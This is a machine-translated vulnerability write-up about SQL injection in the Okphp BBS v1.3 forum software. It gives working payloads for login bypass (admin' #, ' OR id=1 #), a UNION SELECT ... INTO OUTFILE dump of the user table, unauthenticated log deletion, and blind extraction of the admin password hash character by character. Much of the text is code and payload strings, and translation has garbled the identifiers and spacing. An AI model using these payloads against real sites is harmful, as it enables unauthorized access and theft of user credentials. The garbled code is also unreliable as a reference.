I. version Information: OkphpBBSv1.3 the open-source version of PHP and MYSQL is difficult to inject PHP + MYSQL than asp, especially the statement construction during injection, this article mainly analyzes some OkphpBBSv1.3 files to talk about the php + mysql injection statement construction method. I hope this article will be helpful to you. Sound "> <LINK
I. preface:
Version: Okphp BBS v1.3 open-source edition
Due to PHP and MYSQL, injection of PHP + MYSQL is more difficult than that of asp, especially the construction of statements during injection, this article mainly analyzes some files in Okphp BBS v1.3 to discuss the construction of php + mysql injection statements. I hope this article will be helpful to you.
Disclaimer: all the "vulnerabilities" mentioned in this article have not been tested and may not exist at all. In fact, it is not important to have any vulnerabilities. what is important is to analyze ideas and construct statements.
II. vulnerability analysis:
1. authentication bypass vulnerability caused by admin/login. php injection:
Code:
$ Conn = SQL _connect ($ dbhost, $ dbuser, $ dbpswd, $ dbname );
$ Password = md5 ($ password );
$ Q = "select id, group_id from $ user_table where username = '$ username' and password =' $ password '";
$ Res = SQL _query ($ q, $ conn );
$ Row = SQL _fetch_row ($ res );
$ Q = "select id, group_id from $ user_table where username = '$ username' and password =' $ password '"
$ Username and $ password are not filtered and can be easily bypassed. (PHP100 文)
The transformation methods for statements such as select * from $ user_table where username = '$ username' and password =' $ password' include:
Construct 1 (using logical operations): $ username = 'OR 'a' = 'a $ password =' OR 'a' = 'a
Equivalent to SQL statement:
Select * from $ user_table where username = ''OR 'a' = 'a' and password ='' OR 'a' = 'A'
Construct 2 (use the comment statement # In mysql,/* to comment out $ password): $ username = admin' # (or admin '/*)
That is:
Select * from $ user_table where username = 'admin' # 'and password =' $ password '"
Equivalent:
Select * from $ user_table where username = 'admin'
In admin/login. php, $ password in the $ q statement performs md5 encryption before the query. Therefore, it cannot be bypassed by statements in Constructor 1. Here we construct 2:
Select id, group_id from $ user_table where username = 'admin' # 'and password =' $ password '"
Equivalent:
Select id, group_id from $ user_table where username = 'admin'
If you do not know the user name, you only know the corresponding id,
We can construct it like this: $ username = 'OR id = 1 #
Equivalent:
Select id, group_id from $ user_table where username = ''OR id = 1 # and password = '$ password' (# is commented out)
Let's look at the code:
If ($ row [0]) {
// If not admin or super moderator
If ($ username! = "Admin "&&! Eregi ("(^ | &) 3 ($ | &)", $ row [1]) {
$ Login = 0;
}
Else {
$ Login = 1;
}
}
// Fail to login ---------------
If (! $ Login ){
Write_log ("Moderator login", "0", "password wrong ");
Echo "";
Exit ();
}
// Access! -------------
Else {
Session_start ();
Finally, we simply judge by a $ login. we only need to submit $ login = 1 in ie and then bypass it :).
2. authentication bypass vulnerability caused by users/login. php injection:
Code:
$ Md5password = md5 ($ password );
$ Q = "select id, group_id, email from $ user_table where username = '$ username' and password =' $ md5password '";
$ Res = SQL _query ($ q, $ conn );
$ Row = SQL _fetch_row ($ res );
$ Username is not filtered out. comment out and password = '$ md5password' in the same 1 '";
3. the admin \ log \ list. php arbitrary log deletion vulnerability exists. (Ps: This seems to have nothing to do with php + mysql injection, just mention it) (PHP100 Chinese network)
The okphp background seems to be very sloppy, and all files are not judged whether the administrator has logged in, so that he can access them at will. Let's look at the code of list. php:
$ Arr = array ("del_log", "log_id", "del_id ");
Get_r ($ arr );
//
If ($ del_log ){
Omitted ........
If ($ log_id ){
Foreach ($ log_id as $ val ){
$ Q = "delete from $ log_table where id = '$ val '";
$ Res = SQL _query ($ q, $ conn );
If ($ res ){
$ I ++;
}
}
}
Elseif ($ del_id ){
$ Q = "delete from $ log_table where id = '$ del_id '";
$ Res = SQL _query ($ q, $ conn );
}
$ Tpl-> setVariable ("message", "$ I log deleted OK! ");
$ Tpl-> setVariable ("action", "index. php? Action = list_log ");
}
The code simply uses get_r ($ arr); to determine the submitted parameters, we only need to submit the corresponding $ del_log, $ log_id, $ del_id. The deletion is successful.
4. SQL injection vulnerability caused by variable filtering by multiple files.
Okphp authors do not seem to like filtering :). Basically all the variables in SQL statements are "naked. I will not list the specific files. please read the code by yourself. here I will use \ forums \ list_threads.php as an example for a brief discussion.
Check the code of list_threads.php:
$ Q = "select name, belong_id, moderator, protect_view, type_class, theme_id, topic_num, faq_num, cream_num, recovery_num, post_num from $ type_table where id = '$ forum_id '";
$ Res = SQL _query ($ q, $ conn );
$ Row = SQL _fetch_row ($ res );
The variable $ forum_id is not filtered. because mysql does not support subqueries, we can use the union constructor to perform joint queries (MySQL version 4.00 or later is required) to implement cross-database operations. we construct the following:
Construction 1: SELECT * FROM table into outfile '/path/file.txt' (mysql is required to have the file permission. Note that the absolute path is required in the win system, for example: c: // path // file.txt ). Input the content to file.txt. then we can access the query result through http: // ip/path/file.txt. We can construct $ forum_id as follows:
$ Forum_id = 'Union select * from user_table into outfile'/path/file.txt'
Below:
$ Q = "select name, belong_id, moderator, protect_view, type_class, theme_id, topic_num, faq_num, cream_num, recovery_num, post_num from $ type_table where id = '$ forum_id' union select * from user_table into outfile'/path/file.txt '"; (PHP100.com)
The preceding method has strict requirements and must obtain the web path (mysql reports an error by submitting an error variable ), in addition, the magic_gpc = on option of php prevents single quotation marks in injection. If magic_gpc = on, we can also bypass:
Constructor 2: like asp cross-database queries, the union select statement is directly used to construct different statements for different returned results. this method can bypass single quotes (magic_gpc = on) to continue injection, but in php, this injection is relatively difficult, depending on the specific code. For specific statement construction, see pinkeyes's article php injection instance. The following is an example of using okphp to inject "different returned results": (see vulnerability 5 ).
5. admin/login. php and users/login. php uses SQL statement construction to guess and obtain the hash of the specified user password: (in fact, this is the same as that of vulnerability 1 and vulnerability 2. it is taken out separately here, mainly to illustrate the statement construction method .)
The problem Code is the same as vulnerability 1.
Statement structure (ps: because the statement itself is a user database operation, there is no need to use union ):
$ Username = admin' and length (password) = 6 #
The SQL statement is changed:
$ Q = "select id, group_id from $ user_table where username = 'admin' and length (password) = 6 # 'and password =' $ password '"
Equivalent:
$ Q = "select id, group_id from $ user_table where username = 'admin' and length (password) = 6 '"
If LENGTH (password) = 6 is true, the system returns a normal result. if it is not true, mysql reports an error.
In this way, we can guess the user's admin password hash. For example, $ username = admin 'ord (substring (password, 1, 1) = 57 #
You can guess the ascii value of the first password .............